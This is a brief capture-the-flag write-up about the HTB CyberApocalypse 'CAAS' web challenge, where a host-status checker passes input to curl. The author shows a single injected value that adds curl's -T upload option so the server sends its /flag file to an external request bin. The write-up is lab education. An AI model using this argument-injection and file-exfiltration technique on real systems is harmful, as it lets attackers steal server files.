Open in app

Sign in

Write

Sign in

HTB CyberApocalypse CTF: CAAS

Mudhalai Mr
Apr 24, 2021

CAAS is a web-based challenge with a difficulty of two stars,

The website is used to verify the status of a host, it uses the curl command. My first impression was it might be SSRF but I remembered that we can send files using curl, but I was not sure so I did some research.

Yep, we can upload files using the curl command, I spun up a request bin instance and sent the file,

ip = -T /flag http://requestbin.net/r/<id>

We can find the flag in the request bin logs.

Спасибо :) — Mudhalai Mr Team 1nf1n1ty

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Ctf Writeup
Htb
Htb Writeup
Ctf
Cybersecurity
Mudhalai Mr
Mudhalai Mr

Written by Mudhalai Mr

101 Followers
18 Following

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams